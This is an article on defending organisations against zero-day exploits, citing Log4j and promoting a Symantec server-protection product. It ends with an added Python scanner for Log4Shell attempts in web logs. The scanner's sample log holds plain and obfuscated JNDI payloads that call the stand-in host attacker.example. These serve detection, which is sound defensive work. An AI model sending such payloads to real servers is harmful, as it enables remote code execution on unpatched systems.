WatchGuard Threat Lab’s recent Internet Security Report states that 78% of zero-day malware threats evade basic detection. The same trend was seen in previous quarters, which makes a solid case for taking immediate steps to safeguard organisations against zero-day vulnerabilities.
By Fred Mitchell, division manager: software solution at Drive Control Corporation (DCC)
The goalposts have moved: attackers are now targeting unknown vulnerabilities in web servers, Microsoft Exchange and remote-access software. The top 20 exploits blocked by Symantec in 2021 all targeted servers.
A real-life example is Log4j, a widely used Java-based logging library found on many web servers. The vulnerability was disclosed in December 2021, and attackers were so focused on exploiting it that by the end of the month Symantec had blocked more attacks against Log4j than against any other vulnerability in 2021.
Patch management is critical; however, if the software’s developer is not aware of the vulnerability, attackers can create havoc before the weak point is fixed. Organisations must therefore take additional steps to mitigate the potential threat from zero-day vulnerabilities.
Employee Training
Unfortunately, end users are still being targeted. Whilst not as prevalent as a few years ago, it remains vital that employees are given proper training to recognise threats such as phishing and social engineering ruses.
The warning remains the same: it takes only one click on an e-mail link or one visit to a compromised website, now combined with a vulnerability exploit, to spread malicious software throughout the corporate network.
Threat Intelligence
The Threat Intelligence landscape is undoubtedly mature and offers a wide array of features. However, it is important not to forget vulnerabilities. Your Threat Intelligence solution must be able to alert you to newly disclosed vulnerabilities in the software you actually run; this goes a long way towards ensuring the organisation does not fall victim to a zero-day threat.
Transparency
We will never have bug-free software; however, does your vendor of choice offer a simple, user-friendly way to report vulnerabilities? And how do they release patches once vulnerabilities are found?
The next step is to ask about their secure coding practices and how you are protected against a supply-chain attack. Secure coding is an evolving discipline, so invest in a plan that is focused on constant, incremental improvement.
Fortify your servers
As mentioned, cyber criminals’ attack strategy is now firmly set on servers. More than ever, servers must be hardened against zero-day attacks. Whichever way you look at it, a server is a gateway into an organisation and stores its sensitive information.
A Data Centre Solution (DCS) can protect servers before patches are deployed. For example, Symantec’s DCS had multiple policies in place that prevented Log4j, and other vulnerabilities like it, from being exploited on protected servers while patches were still outstanding.
Ultimately, a DCS delivers comprehensive server protection, providing visibility, compliance, monitoring and management across a broad array of operating systems and legacy servers. It is a very important step in preventing zero-day exploitation.
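Protecting a server before the patch lands usually comes down to recognising the exploit attempt in traffic or logs. The following is an added example, not code from the article or from any Symantec product: a small Python scanner that walks web-server access-log lines looking for the Log4j JNDI lookup pattern behind the December 2021 vulnerability (Log4Shell, CVE-2021-44228). The interesting part is the normalisation step: attackers hid the literal `${jndi:` behind URL encoding and nested Log4j lookups such as `${lower:j}` and `${::-j}`, so a naive substring match misses most real attempts. The log lines, client addresses and `attacker.example` host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample (not real traffic). Lines 2-5 carry Log4Shell-style
# payloads in the User-Agent or query string; lines 1 and 6 are benign, and line 6
# contains the word "jndi" without a lookup, to show the scanner does not over-match.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:10:01:11 +0000] "GET /api?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:10:01:12 +0000] "GET /x HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/z}"
10.0.0.7 - - [10/Dec/2021:10:01:15 +0000] "GET /docs?topic=jndi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Innermost Log4j lookups that attackers used to obfuscate the string "jndi".
# Each pattern deliberately excludes "$" and "}" inside the braces, so only the
# innermost lookup matches on each pass and nesting is unwound from the inside out.
_LOWER = re.compile(r"\$\{\s*lower\s*:\s*([^}$]*)\}", re.I)     # ${lower:J} -> j
_UPPER = re.compile(r"\$\{\s*upper\s*:\s*([^}$]*)\}", re.I)     # ${upper:j} -> J
_DEFAULT = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")               # ${::-j}, ${env:X:-j} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)                     # the lookup we care about


def normalize(raw: str, max_rounds: int = 10) -> str:
    """URL-decode twice (to catch double encoding) and strip lookup wrappers until stable."""
    text = unquote(unquote(raw))
    for _ in range(max_rounds):
        unwound = _LOWER.sub(lambda m: m.group(1).lower(), text)
        unwound = _UPPER.sub(lambda m: m.group(1).upper(), unwound)
        unwound = _DEFAULT.sub(lambda m: m.group(1), unwound)
        if unwound == text:  # fixed point: no more wrappers to remove
            break
        text = unwound
    return text


def is_jndi_lookup(raw: str) -> bool:
    """True if the (normalised) string contains a Log4j JNDI lookup."""
    return bool(_JNDI.search(normalize(raw)))


def scan_log(text: str) -> list:
    """Return one finding per log line that carries a JNDI lookup attempt."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if is_jndi_lookup(line):
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],   # first field of a combined-format line
                "normalized": normalize(line),     # what the payload decodes to
            })
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']}: {hit['normalized']}")
```

The same normalise-then-match logic is what a request-inspection rule in front of a server has to do to block these attempts rather than merely log them; matching on the raw bytes alone would catch only the first of the four payloads above.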